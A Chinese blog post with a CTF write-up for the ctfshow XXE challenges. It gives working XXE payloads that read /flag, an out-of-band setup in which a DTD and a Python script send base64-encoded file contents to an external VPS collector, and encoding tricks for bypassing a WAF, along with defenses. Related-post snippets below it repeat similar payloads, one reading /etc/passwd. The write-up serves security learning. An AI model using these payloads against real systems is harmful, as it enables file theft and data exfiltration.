ctfshow—XXE

最新推荐文章于 2024-03-30 23:48:14 发布
原创 最新推荐文章于 2024-03-30 23:48:14 发布 · 1.1k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#1024程序员节

XXE

XXE:XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。例如PHP中的simplexml_load 默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml_load_string()。

XXE可导致读取任意文件,探测内网端口,攻击内网网站,发起拒绝服务攻击,执行系统命令等。Java中的XXE支持sun.net.www.protoco里的所有协议:http,https,file,ftp,mailto,jar,netdoc。一般利用file协议读取文件,利用http协议探测内网。

学习链接:

https://xz.aliyun.com/t/3357

https://www.freebuf.com/column/181064.html

实战(ctfshow)

web373(有回显)

error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    $creds = simplexml_import_dom($dom);
    $ctfshow = $creds->ctfshow;
    echo $ctfshow;
}
highlight_file(__FILE__);

直接通过DTD外部实体声明。

<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///flag">
]>
<snakin>
<ctfshow>&xxe;</ctfshow>
</snakin>

POST传入即可

web374-376(无回显)

error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);

无回显xxe可以利用自己的vps带外输出。

为区分嵌套实体和实体之间的关系,可以通过单双引号来间隔开,引号中嵌套一个参数实体,其%号需要写成:%也可写为16进制的%

先建立一个index.php

<?php 
    $cookie = $_GET['q'];
    $myFile = "cookie.txt";
    file_put_contents($myFile, $cookie, FILE_APPEND);
?>

xxe.dtd

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://42.192.137.212/index.php?q=%file;'>">

post发送请求

import requests

url = 'http://8bb031b1-bab9-43fe-b73b-d9741ed6617b.chall.ctf.show/'
payload = """<!DOCTYPE convert [ 
<!ENTITY % remote SYSTEM "http://42.192.137.212/evil.dtd">
%remote;%int;%send;
]>
"""
requests.post(url, data=payload)

之后在网站根目录 cookie.txt 查看获取的 flag 即可

绕过

一个xml文档不仅可以用UTF-8编码,也可以用UTF-16(两个变体 - BE和LE)、UTF-32(四个变体 - BE、LE、2143、3412)和EBCDIC编码。

在这种编码的帮助下,使用正则表达式可以很容易地绕过WAF,因为在这种类型的WAF中,正则表达式通常仅配置为单字符集。

外来编码也可用于绕过成熟的WAF,因为它们并不总是能够处理上面列出的所有编码。例如,libxml2解析器只支持一种类型的utf-32 - utf-32BE,特别是不支持BOM。

XXE自动化工具

XXEinjector:一款功能强大的自动化XXE注射工具。

推荐一篇文章,详细的讲述了其使用方法,最后还附了XXEinjector工具的下载。

XXE的防御

  • 使用开发语言提供的禁用外部实体的方法

PHP

libxml_disable_entity_loader(true);

JAVA

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();

dbf.setExpandEntityReferences(false);

Python

from lxml import etree xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

  • 过滤用户提交的XML数据

过滤关键词:<!DOCTYPE<!ENTITY,或者SYSTEMPUBLIC

参考链接:https://blog.csdn.net/weixin_45669205/article/details/115122209

ctfshow XXE
lwbcsd的博客
04-03 4644
xxe web373 有回显 函数介绍 libxml_disable_entity_loader #禁用/启用加载外部实体的功能 参数为true时为禁用,参数为false为启用 file_get_contents('php://input') #简单理解就是接受POST请求方式传的数据 loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD) #通过解析一个 XML 标签字符串来组成该文档 simplexml_import_dom #把 DOM 节点
XXE漏洞(ctfshow-xxe)
unexpectedthing的博客
10-29 1167
文章目录XEE漏洞的原理ctfshow-xxeweb373web374,375,376web377web378 XEE漏洞的原理 XML外部实体注入 ctfshow-xxe web373 代码 <?php error_reporting(0); libxml_disable_entity_loader(false); //file_get_contents("php://input"),我们需要post我们的payload $xmlfile = file_get_contents('php://inp
CTFshow XXE
starttv的博客
11-10 645
为区分嵌套实体和实体之间的关系,可以通过单双引号来间隔开,引号中嵌套一个参数实体,其%号需要写成:%也可写为16进制的%(1)使用 % 实体名(这里面空格不能少) 在 DTD 中定义,并且只能在 DTD 中使用 %实体名;用bp抓包,可以发现传的内容是xml,并且在username处有回显,直接xxe。引用的实体,他在DTD 中定义,在 XML 文档中引用。(2)只有在 DTD 文件中,参数实体的声明才能引用其他实体。发现了过滤,用空格绕过一下就可以了,步骤和上题一样。过滤了大小写,还是用空格绕过。
ctfshowXXE
njh18790816639的博客
05-26 459
XXE(XML External Entity Injection) 全称为 XML 外部实体注入。 web373 error_reporting(0); libxml_disable_entity_loader(false); $xmlfile = file_get_contents('php://input');//以php伪协议接收一个值 if(isset($xmlfile)){ $dom = new DOMDocument();//创建内部类Document对象 $dom->l
CTFShow XXE
paidx0
08-26 1921
前言 XXE 的漏洞在我的上一篇文章有讲过,这里就不多说,直接看题 XXE外部实体注入 web373 有回显的文件读取 <?xml version="1.0"?> <!DOCTYPE xml [ <!ENTITY xxe SYSTEM "file:///flag"> ]> <paidx0> <ctfshow>&xxe;</ctfshow> </paidx0> web374~376 无回显的文件读取,禁用了版本
CTFshow_Web_XXE——web373~377
Ho1aAs‘s Blog
05-07 2891
文章目录参考文章题解web373web374~376web377完 参考文章 一篇文章带你深入理解漏洞之 XXE 漏洞 未知攻焉知防——XXE漏洞攻防 题解 web373 常规XXE flag的路径是/flag // 允许加载外部实体 libxml_disable_entity_loader(false); // xml文件来源于数据流 $xmlfile = file_get_contents('php://input'); if(isset($xmlfile)){ $dom = new DOMDo
ctfshow xxe
08-15
XXE(XML External Entity)漏洞是指在处理XML时,未...如果你需要关于XXE的具体题目或解题思路,可以参考CTFShow平台上与XXE相关的题目。请注意,利用XXE漏洞进行非法攻击是违法行为,请合法、合规地使用这些知识。
CTFshow XXE(web373-378)
Kradress的博客
03-18 634
post提交,这里外部引入vps的dtd文件。抓包发现username处存在回显。base64解码拿到flag。直接套八股文,拿到flag。这里需要一个根节点来包含。这里用python脚本。这里可以外部引入一个。
CTFSHOW-XXE
m0_74456293的博客
06-03 568
CTFSHOW-XXE
ctfshow_XXE
qq_45951598的博客
03-24 380
文章目录WEB373 WEB373 这里先放看一下理解漏洞之 XXE 漏洞 error_reporting(0); libxml_disable_entity_loader(false); $xmlfile = file_get_contents('php://input'); if(isset($xmlfile)){ $dom = new DOMDocument(); //创建内部类Document对象 $dom->loadXML($xmlfile, LIBXML_NOENT |
ctfshow--xxe
qq_51684648的博客
03-15 2682
ctfshowxxe 有回显 <?php error_reporting(0); libxml_disable_entity_loader(false); //file_get_contents("php://input"),我么需要post我们的payload $xmlfile = file_get_contents('php://input'); if(isset($xmlfile)){ //DOMDocument,表示整个HTML或XML文档;作为文档树的根 $dom =
ctfshow web入门 XXE
最新发布
2301_79442654的博客
03-30 1149
XXE(XML External Entity)攻击是一种针对XML处理漏洞的网络安全攻击手段。攻击者利用应用程序在解析XML输入时的漏洞,构造恶意的XML数据,进而实现各种恶意目的。所以要学习xxe就需要了解xml。
CTFSHOWXXE
灰太的表格的博客
01-31 486
(睡了一下午打算,通宵学习hhhh) web373 wa1ki0g标签可以随便改,ctfshow这个不可以。 !DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <wa1ki0g> <ctfshow>&xxe;</ctfshow> </wa1ki0g>
ctfshow-XXE(web373-web378)
m0_72125469的博客
03-11 1636
ctfshow web373 web374 web375 web376 web377 web378
CTFshow——XXE
D.MIND 的博客
08-23 980
web373 <?php error_reporting(0); libxml_disable_entity_loader(false); $xmlfile = file_get_contents('php://input'); if(isset($xmlfile)){ $dom = new DOMDocument(); $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); $creds = simplexml_i
CTFSHOW xxe
羽的博客
01-11 3479
web373 payload <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///flag"> ]> <yu22x> <ctfshow>&xxe;</ctfshow> </yu22x> web374、375、376 payload <!DOCTYPE test [ <!ENTITY % file SYSTEM "php://filter/read=convert.base64
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Snakin_ya

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值